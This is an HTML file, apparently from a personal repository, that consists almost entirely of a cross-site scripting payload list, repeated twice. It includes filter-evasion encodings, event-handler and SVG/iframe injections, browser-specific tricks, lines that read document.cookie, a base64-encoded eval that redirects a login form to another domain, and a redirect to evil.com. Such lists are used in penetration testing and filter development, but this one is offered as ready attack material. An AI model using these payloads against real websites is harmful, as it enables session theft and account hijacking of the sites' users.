OlivierLaflamme/l.html

## l.html
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">javascript:prompt(1)
iframe src='javascript:prompt(document.domain);'>//
&quot;&gt;&lt;svg/onload=alert(1)&gt;
<svg/onload=javascript:void(0)?void(0):void(0)?:void(0)?void(0):void(0)?void(0):confirm
svg onload="prompt(/xss/)"></svg>
q"><img src=x onmouseover=prompt(1);>.jpg
"><img src=x onmouseover=alert(1)"></img>
x"></script><img src=x onerror=alert(1)>
<div style="background-image:url(javascript:alert('XSS'))">
<table background="javascript:alert('XSS')">
"><iframe src='javascript:prompt(document.domain);'>
"><iframe/src=javascript:alert(document.cookie)>
<iframe src="http://google.com"></iframe>
&quot;&gt;&lt;img src=x onerror=alert(1)>
"><b onmouseover=alert('wufff!')>Hussain Adnan  ... Hack  ! </b>
"><script>alert(String.fromCharCode(88, 83, 83));</script>
<a onmouseover="alert(1)" href="http://dhiqaroffice.com/test-pentest/testhtmlxss.html">read this!</a>
<IMG SRC="javascript:alert('XSS');">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Air'/></3></>"><img src=1.gif onerror=alert(document.cookie)>tel
<a  onmouseover="alert(1)">XXS link</a>
<img src="<img src=search"/onerror=alert('Hi')/">
<a href="blah onclick=alert(8007) ignoreme="blah">Click Me</a>
<A HREF=?xss onClick=alert(&#39Xss&#39)>blah</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
onmouseover=alert('XSS')
"onmouseover=alert(1)"
"onmouseover=alert(1)"
<img src="x" alt="``onerror=alert(1)">
"><svg/onload=prompt(2)>"<input onfocus="alert(1337)"autofocus>
">alert(1) #"> t" onmouseover=alert(1); a=" "onmouseover=prompt(1)>
“><img src=x onerror=confirm(1);>
&quot;&gt;&lt;img src=x onerror=prompt(1);&gt;
"><a onmouseover=alert(1)>a.jpg
alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//; alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT><script>alert(document.domain)</script><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
quot;&gt;&lt;svg/onload=window.onerror=alert;throw/XSS/;//
&quot;&gt;&lt;img src=x onerror=prompt(1)&gt;
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
&quot;&gt;&lt;svg/onload=prompt(0)&gt;
&quot;&gt;&lt;script/src=data:,alert(1)%2b"
&quot;&gt;&lt;script/src=data:,alert(1)%26sol;%26sol;
javascript:alert%281%29;
"><img src="http://i.imgur.com/08ntkha.jpg" onerror=prompt(document.cookie)>
"><svg/onload=confirm("XSS")>;
<iframe onload="alert('XSSED BY Hussain');"></iframe>http://<iframe onload="alert('XSSED BY Hussain Adnan');"></iframe>
<img src="a" onerror='eval(atob("ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInlvdXJsb2dpbiIpLmFjdGlvbj0idGhlZG9tYWluLm5ldCI7"))'
brute<body/onpageshow=(prompt)(/XSSPOSED/)>logic
onmouseover=alert('XSS')
" onmouseover=alert(1) "
<svg><x><script>alert&#40;7&#41</x>
<svg/brute><x><script/logic>al&#101rt&#40;7&#41</x>
<script> alert("XSSPOSED")<\script>>\
--><svg/onload=alert(/XSSPOSED/)//
<\i\m\g \s\r\c=x \o\n\e\r\r\o\r=\a\l\e\r\t(\'X\S\S\')\>'
"><img src=”data:;base64,YWxlcnQoOSk” onerror=prompt(1);>
<script/xx>/**/alert(/XSSPOSED/)//
"><script>alert(String.f romCharCode(88, 83, 83, 80, 79, 83, 69, 68))</script>
<iframe src="j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)"></iframe>
'%3d'>"><iframe src="https://atmail.com" onmouseover=alert(document.domain)></iframe>/927
<img src=# onerror=alert(document.cookie)>
-><a id="a"href=javascript&colon;alert&lpar;1&rpar; id="a">Click</a>
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px  AAAAAAAAAAAA...[64 kb]..AAA'></a>
http://example.com%20onmouseover=alert(1)%20style=font-size:100pt%20
<img src="<img onmouseover=alert(document.domain) src=x>"></img>
<script <a href="">atob</a>/,alert(document.domain)</script </td>
<img<img onmouseover=alert(1) src=x >></img>
<img src="<img onmouseover=alert(1) src=x>"></img>
<script>alert(1)</script>
<a onmouseover=alert(1)>click
"><IMG """><SCRIPT>alert("XSS")<CRIPT>">/S
<img alt="<img onerror=alert(document.domain)//"<">
<img src= onmouseover=javascript:alert(String.fromCharCode(83,116,111,114,101,100,32,88,83,83,32,105,110,32,77,105,99,114,111,115,111,102,116))>
<i onmouseover=alert(1)> <i></i>
<div style="width: expression(alert(/XSS_Jams/));"></div>
\<input type=</script><svg><script>/<@/>alert(1337)</script>
"”text”" value="”Your_name”"><input type="submit" value="Submit request" />
1"--><svg/onload=';alert(0);'>
"+confirm(1)+"#/
<script>confirm(document.domain);alert(1)</script>
<script>$='XSSPOSED',alert($)< /script>-jobs/
<IMG alt=``onerror=alert(1) src="x">
<img src="foo" alt="``onerror=alert(1)" />
<?XML:NAMESPACE PREFIX = [default] ><img src=x
onerror=alert(1) NS = "><img src=x onerror=alert(1)"
"><article xmlns="><img src=x onerror=alert(1)"></article>
'-confirm(1)-'
<image src=`` onerror=setTimeout/*("__")*/`\u0061lert\u00281\u0029/**/`>
<a href="data:\@['{§(`__`)$}']@\, % 3 c script % 3 e alert(1) % 3 c/script %3 e">FireFox</a>
<style onload='execScript(/**/"\x61lert&#40 1&#41","j\x61vascript");'>  (IE)
<iframe onload="document.location.href=http://evil.com><svg/onload=alert(1)>&order=desc'">
</script><script>confirm(1)</script> becomes </script-disabled><script-disabled>confirm(1)</script-disabled>
</script%0A-_-><script>confirm(1)</script%0A-_->
<p style='\00\xss:\0a\0b\0c\09\65xpre\73sio\6e/**/(\61lert(1))'>hello world</p> (IE)
<input type="search" onsearch=prompt(1)  autofocus> (chrome)
<details ontoggle=confirm(1)> (chrome)
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
[Click here](javascript:alert(1))
'-confirm(1)-'
<div</textarea><script>alert(123)</script>
<style=animation-name:x onanimationstart=alert(1)>
<img src=x onerror="alert(1)"
<img onerror=alert(document.domain) src <u></u>
"><script src=//3237054390/1>
<script xmlns="http://www.w3.org/xhtml">alert(0)</script>
<a style="-webkit-user-modify: read-only;" =href"javascript:alert(1)">CLICK
<marquee loop=1 width=0 onfinish=alert(1)>
<img src=a:alert(1) onerror=eval(src)>
<javas style=font-size:500px onmouseover=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
<title><img src='</title><img src=s onerror=alert(1)>'></title>
“><script>alert(1);</script>”@sucuri.net
<iframe src="data:$te?QWERTY%(x)[0]{t}*/h123t456m789l0,<script>alert(document.domain)</script>">
<script/img>alert(/hussain/)</script/>
xxxxxxxx'yyyyy</img
<applet onerror=alert('xss')>
--><object/data=javascript:top[/ale/.source%2b/rt/.source]`@brutelogic`>
<script>x = '',__defineSetter__('x',alert),x=1,'';</script>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<base href="javascript:\"> <a href="//%0aalert(/@irsdl/);//">works in Chrome</a>
\"; confirm(1); //
<img/src="x"/onerror="alert(document.domain)">@hotmail.com
<img/src="hat.png"/onerror="alert(1)">
<video/src/onratechange=alert(1)>
<body/onpageshow=alert(1)>
<frameset/onpageshow=alert(1)>
<input type=search onsearch="location='data:text/html;\x62\x61\x73\x65\x36\x34,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='">
<div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div>
<div onbeforescriptexecute="alert(1)"></div><script>1</script>
<div onactivate="alert(1)" id="xss" style="overflow:scroll"></div>
<style>@keyframes x{}</style> <div style="animation-name:x" onanimationstart="alert(1)"></div>
<style> div {width: 100px;} div:target {width: 200px;} </style> <div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div>
<input value=<><iframe/src=javascript:confirm(1)
<svg%2fonload=alert(1)>
"><img src=a onerror=confirm(/2/)></textarea><ScRiPt>prompt(/920065/)</ScRiPt>'-confirm(1)-'<iframe/onload=alert(1)>
<script>alert(1);//
<mArquee%20onStart%3D[~[onmouseleave(([[(alert(1))]]))]]%20]
<svg><script /* /*/*/*>\u0061l\u0065rt`X`</x+x
<img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert(00039) )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert(322)gt;\x3e>
<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
%27-alert(document.domain)-%27
eval(Symbol(')-alert(1').toString())
%27</script><script>alert(0)</script></something:script>
</body>
</html>
	<html>
	<head></head>
	<body>
	<something:script xmlns:something="http://www.w3.org/1999/xhtml">javascript:prompt(1)
	iframe src='javascript:prompt(document.domain);'>//
	"><svg/onload=alert(1)>
	<svg/onload=javascript:void(0)?void(0):void(0)?:void(0)?void(0):void(0)?void(0):confirm
	svg onload="prompt(/xss/)"></svg>
	q"><img src=x onmouseover=prompt(1);>.jpg
	"><img src=x onmouseover=alert(1)"></img>
	x"></script><img src=x onerror=alert(1)>
	<div style="background-image:url(javascript:alert('XSS'))">
	<table background="javascript:alert('XSS')">
	"><iframe src='javascript:prompt(document.domain);'>
	"><iframe/src=javascript:alert(document.cookie)>
	<iframe src="http://google.com"></iframe>
	"><img src=x onerror=alert(1)>
	"><b onmouseover=alert('wufff!')>Hussain Adnan ... Hack ! </b>
	"><script>alert(String.fromCharCode(88, 83, 83));</script>
	<a onmouseover="alert(1)" href="http://dhiqaroffice.com/test-pentest/testhtmlxss.html">read this!</a>
	<IMG SRC="javascript:alert('XSS');">
	<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
	Air'/></3></>"><img src=1.gif onerror=alert(document.cookie)>tel
	<a onmouseover="alert(1)">XXS link</a>
	<img src="<img src=search"/onerror=alert('Hi')/">
	<a href="blah onclick=alert(8007) ignoreme="blah">Click Me</a>
	<A HREF=?xss onClick=alert(&#39Xss&#39)>blah</a>
	<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
	onmouseover=alert('XSS')
	"onmouseover=alert(1)"
	"onmouseover=alert(1)"
	<img src="x" alt="``onerror=alert(1)">
	"><svg/onload=prompt(2)>"<input onfocus="alert(1337)"autofocus>
	">alert(1) #"> t" onmouseover=alert(1); a=" "onmouseover=prompt(1)>
	“><img src=x onerror=confirm(1);>
	"><img src=x onerror=prompt(1);>
	"><a onmouseover=alert(1)>a.jpg
	alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//; alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT><script>alert(document.domain)</script><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	quot;><svg/onload=window.onerror=alert;throw/XSS/;//
	"><img src=x onerror=prompt(1)>
	"><img src=x onerror=confirm(1);>
	"><svg/onload=prompt(0)>
	"><script/src=data:,alert(1)%2b"
	"><script/src=data:,alert(1)%26sol;%26sol;
	javascript:alert%281%29;
	"><img src="http://i.imgur.com/08ntkha.jpg" onerror=prompt(document.cookie)>
	"><svg/onload=confirm("XSS")>;
	<iframe onload="alert('XSSED BY Hussain');"></iframe>http://<iframe onload="alert('XSSED BY Hussain Adnan');"></iframe>
	<img src="a" onerror='eval(atob("ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInlvdXJsb2dpbiIpLmFjdGlvbj0idGhlZG9tYWluLm5ldCI7"))'
	brute<body/onpageshow=(prompt)(/XSSPOSED/)>logic
	onmouseover=alert('XSS')
	" onmouseover=alert(1) "
	<svg><x><script>alert(7&#41</x>
	<svg/brute><x><script/logic>al&#101rt(7&#41</x>
	<script> alert("XSSPOSED")<\script>>\
	--><svg/onload=alert(/XSSPOSED/)//
	<\i\m\g \s\r\c=x \o\n\e\r\r\o\r=\a\l\e\r\t(\'X\S\S\')\>'
	"><img src=”data:;base64,YWxlcnQoOSk” onerror=prompt(1);>
	<script/xx>/**/alert(/XSSPOSED/)//
	"><script>alert(String.f romCharCode(88, 83, 83, 80, 79, 83, 69, 68))</script>
	<iframe src="j
	a
	v
	a
	s
	c
	r
	i
	p
	t
	:
	a
	l
	e
	r
	t
	(
	1
	)"></iframe>
	'%3d'>"><iframe src="https://atmail.com" onmouseover=alert(document.domain)></iframe>/927
	<img src=# onerror=alert(document.cookie)>
	-><a id="a"href=javascript&colon;alert(1) id="a">Click</a>
	<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
	http://example.com%20onmouseover=alert(1)%20style=font-size:100pt%20
	<img src="<img onmouseover=alert(document.domain) src=x>"></img>
	<script <a href="">atob</a>/,alert(document.domain)</script </td>
	<img<img onmouseover=alert(1) src=x >></img>
	<img src="<img onmouseover=alert(1) src=x>"></img>
	<script>alert(1)</script>
	<a onmouseover=alert(1)>click
	"><IMG """><SCRIPT>alert("XSS")<CRIPT>">/S
	<img alt="<img onerror=alert(document.domain)//"<">
	<img src= onmouseover=javascript:alert(String.fromCharCode(83,116,111,114,101,100,32,88,83,83,32,105,110,32,77,105,99,114,111,115,111,102,116))>
	<i onmouseover=alert(1)> <i></i>
	<div style="width: expression(alert(/XSS_Jams/));"></div>
	\<input type=</script><svg><script>/<@/>alert(1337)</script>
	"”text”" value="”Your_name”"><input type="submit" value="Submit request" />
	1"--><svg/onload=';alert(0);'>
	"+confirm(1)+"#/
	<script>confirm(document.domain);alert(1)</script>
	<script>$='XSSPOSED',alert($)< /script>-jobs/
	<IMG alt=``onerror=alert(1) src="x">
	<img src="foo" alt="``onerror=alert(1)" />
	<?XML:NAMESPACE PREFIX = [default] ><img src=x
	onerror=alert(1) NS = "><img src=x onerror=alert(1)"
	"><article xmlns="><img src=x onerror=alert(1)"></article>
	'-confirm(1)-'
	<image src=`` onerror=setTimeout/("__")/`\u0061lert\u00281\u0029/**/`>
	<a href="data:\@['{§(`__`)$}']@\, % 3 c script % 3 e alert(1) % 3 c/script %3 e">FireFox</a>
	<style onload='execScript(/**/"\x61lert&#40 1&#41","j\x61vascript");'> (IE)
	<iframe onload="document.location.href=http://evil.com><svg/onload=alert(1)>&order=desc'">
	</script><script>confirm(1)</script> becomes </script-disabled><script-disabled>confirm(1)</script-disabled>
	</script%0A-_-><script>confirm(1)</script%0A-_->
	<p style='\00\xss:\0a\0b\0c\09\65xpre\73sio\6e/**/(\61lert(1))'>hello world</p> (IE)
	<input type="search" onsearch=prompt(1) autofocus> (chrome)
	<details ontoggle=confirm(1)> (chrome)
	javascript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
	[Click here](javascript:alert(1))
	'-confirm(1)-'
	<div</textarea><script>alert(123)</script>
	<style=animation-name:x onanimationstart=alert(1)>
	<img src=x onerror="alert(1)"
	<img onerror=alert(document.domain) src <u></u>
	"><script src=//3237054390/1>
	<script xmlns="http://www.w3.org/xhtml">alert(0)</script>
	<a style="-webkit-user-modify: read-only;" =href"javascript:alert(1)">CLICK
	<marquee loop=1 width=0 onfinish=alert(1)>
	<img src=a:alert(1) onerror=eval(src)>
	<javas style=font-size:500px onmouseover=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
	<title><img src='</title><img src=s onerror=alert(1)>'></title>
	“><script>alert(1);</script>”@sucuri.net
	<iframe src="data:$te?QWERTY%(x)[0]{t}*/h123t456m789l0,<script>alert(document.domain)</script>">
	<script/img>alert(/hussain/)</script/>
	xxxxxxxx'yyyyy</img
	<applet onerror=alert('xss')>
	--><object/data=javascript:top[/ale/.source%2b/rt/.source]`@brutelogic`>
	<script>x = '',__defineSetter__('x',alert),x=1,'';</script>
	<div onactivate=alert('Xss') id=xss style=overflow:scroll>
	<base href="javascript:\"> <a href="//%0aalert(/@irsdl/);//">works in Chrome</a>
	\"; confirm(1); //
	<img/src="x"/onerror="alert(document.domain)">@hotmail.com
	<img/src="hat.png"/onerror="alert(1)">
	<video/src/onratechange=alert(1)>
	<body/onpageshow=alert(1)>
	<frameset/onpageshow=alert(1)>
	<input type=search onsearch="location='data:text/html;\x62\x61\x73\x65\x36\x34,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='">
	<div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div>
	<div onbeforescriptexecute="alert(1)"></div><script>1</script>
	<div onactivate="alert(1)" id="xss" style="overflow:scroll"></div>
	<style>@keyframes x{}</style> <div style="animation-name:x" onanimationstart="alert(1)"></div>
	<style> div {width: 100px;} div:target {width: 200px;} </style> <div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div>
	<input value=<><iframe/src=javascript:confirm(1)
	<svg%2fonload=alert(1)>
	"><img src=a onerror=confirm(/2/)></textarea><ScRiPt>prompt(/920065/)</ScRiPt>'-confirm(1)-'<iframe/onload=alert(1)>
	<script>alert(1);//
	<mArquee%20onStart%3D[~[onmouseleave(([[(alert(1))]]))]]%20]
	<svg><script /* ///*>\u0061l\u0065rt`X`</x+x
	<img border=3 alt=jaVasCript:/-/`/\`/'/"//(/ */oNcliCk=alert(00039) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(322)gt;\x3e>
	<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
	%27-alert(document.domain)-%27
	eval(Symbol(')-alert(1').toString())
	%27</script><script>alert(0)</script></something:script>
	</body>
	</html>
No results found